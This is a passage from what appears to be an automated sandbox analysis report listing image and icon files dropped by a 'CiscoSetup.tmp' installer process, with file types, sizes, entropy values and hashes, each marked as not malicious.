                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.044905068349432
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0468421318534369
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2213
                                                                                                                                                                                                  Entropy (8bit):4.905752993252195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.612237043911612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                                                                                  MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                                                                                  SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                                                                                  SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                                                                                  SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4370
                                                                                                                                                                                                  Entropy (8bit):7.900909498577029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                                                                                  MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                                                                                  SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                                                                                  SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                                                                                  SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2465
                                                                                                                                                                                                  Entropy (8bit):7.9078675566370515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                                                                                  MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                                                                                  SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                                                                                  SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                                                                                  SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1856
                                                                                                                                                                                                  Entropy (8bit):7.845521158056495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                                                                                  MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                                                                                  SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                                                                                  SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                                                                                  SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28939
                                                                                                                                                                                                  Entropy (8bit):7.960017526195935
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                                                                                  MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                                                                                  SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                                                                                  SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                                                                                  SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4117
                                                                                                                                                                                                  Entropy (8bit):7.943813748161345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                                                                                  MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                                                                                  SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                                                                                  SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                                                                                  SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):472
                                                                                                                                                                                                  Entropy (8bit):7.339402871750466
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                                                                                  MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                                                                                  SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                                                                                  SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                                                                                  SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):543
                                                                                                                                                                                                  Entropy (8bit):7.547901309478316
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                                                                                  MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                                                                                  SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                                                                                  SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                                                                                  SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13633
                                                                                                                                                                                                  Entropy (8bit):7.975971786407776
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                                                                                  MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                                                                                  SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                                                                                  SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                                                                                  SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12068
                                                                                                                                                                                                  Entropy (8bit):7.961027992023309
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                                                                                  MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                                                                                  SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                                                                                  SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                                                                                  SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76615
                                                                                                                                                                                                  Entropy (8bit):6.470162664157233
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                                                                                  MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                                                                                  SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                                                                                  SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                                                                                  SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):431993
                                                                                                                                                                                                  Entropy (8bit):4.565786626694248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                                                                                  MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                                                                                  SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                                                                                  SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                                                                                  SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10811
                                                                                                                                                                                                  Entropy (8bit):7.9725003667897125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                                                                                  MD5:A805DED6582E8382AB22EAF761559ED7
                                                                                                                                                                                                  SHA1:2C5C4C718AFC5566FB5D6B458CAFB04AC96B6A13
                                                                                                                                                                                                  SHA-256:393968B4F0F62527169D0D3DB56D756DE094D6F91252536BCD08770B83C98446
                                                                                                                                                                                                  SHA-512:F47219CE8D631FB79BF9FF67D24B57253A5F56E2DF98A35C5769D84A101E6E6ADA66D2B2E1FA6B1141087060200F97E48EA01B99CBE9B81FFA727E76ABA07713
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26674
                                                                                                                                                                                                  Entropy (8bit):7.935979285003627
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                                                                                  MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                                                                                  SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                                                                                  SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
                                                                                                                                                                                                  SHA-512:BCC1BC2AE795109EF83422613D9B0D9FF23EA81136479748FFA7CD7FC03D527B4744833728637F7892B5F60DD476F1F32122AECCCC26DB2D6092CD2346A750BA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12558
                                                                                                                                                                                                  Entropy (8bit):7.968059020803266
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                                                                                  MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                                                                                  SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                                                                                  SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                                                                                  SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16443
                                                                                                                                                                                                  Entropy (8bit):7.760065707691873
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                                                                                  MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                                                                                  SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                                                                                  SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                                                                                  SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11747
                                                                                                                                                                                                  Entropy (8bit):7.9792800328394184
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6O6eUrSbvYvQ77S7PmrQJhWxQLVBinCEBWLp41ZvPaiTlShB9R022uRx1ohfiq:67RSbAvQyCED4QLVBiCLLS1hhMv022u6
                                                                                                                                                                                                  MD5:49E51BACF675B9DF74CD84F600645F0F
                                                                                                                                                                                                  SHA1:563FBED61D83375EE51DD85FD7DC71B53D048ADF
                                                                                                                                                                                                  SHA-256:25EA8BC480B6E97548BD3F64ED6128686C06CAFAA772025B24C2F52CE39B137A
                                                                                                                                                                                                  SHA-512:3231ED2D95E3B2DD1AF2956D3FB29EC7D6AC2D8A5FA6CF12DDA967BCA25CBB3D69B393265B38592B8DB62CC93D55903BE827BD5AC5E119DB5D80E2CE54DDA084
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83111
                                                                                                                                                                                                  Entropy (8bit):7.138058183615623
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                                                                                  MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                                                                                  SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                                                                                  SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                                                                                  SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):291
                                                                                                                                                                                                  Entropy (8bit):6.344520469543007
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                                                                                  MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                                                                                  SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                                                                                  SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                                                                                  SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26026
                                                                                                                                                                                                  Entropy (8bit):7.927985837095832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                                                                                  MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                                                                                  SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                                                                                  SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                                                                                  SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29327
                                                                                                                                                                                                  Entropy (8bit):7.967732566337996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                                                                                  MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                                                                                  SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                                                                                  SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                                                                                  SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8950
                                                                                                                                                                                                  Entropy (8bit):7.969730039207073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                                                                                  MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                                                                                  SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                                                                                  SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                                                                                  SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388
                                                                                                                                                                                                  Entropy (8bit):7.139959170245274
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7Hel//IgFAkq3Dhp5tRX3Sq+IeSzgKOg6p2e:aehvFXSELAgKja2e
                                                                                                                                                                                                  MD5:34C2847A763607A881B1E9A81CA9A4DC
                                                                                                                                                                                                  SHA1:B6050C2A1AA45C78F273B76FB729158E0F172D18
                                                                                                                                                                                                  SHA-256:4D735FCC94C53B0753F49E2656EE480D37F4899520F17C48FF7D1F0DDC2A9A8C
                                                                                                                                                                                                  SHA-512:8E3C4C1F62BDF79B2C5263D0C4DD97E302261A0C5C9399C13FADD3E25301F7DDA7297ECE3A8352534C9DA4B3A23FFE497FD61BDA348D14BB6658AF2C66863727
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3880
                                                                                                                                                                                                  Entropy (8bit):6.742220289284142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):478
                                                                                                                                                                                                  Entropy (8bit):7.3703130572324955
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11585
                                                                                                                                                                                                  Entropy (8bit):7.961332304899258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
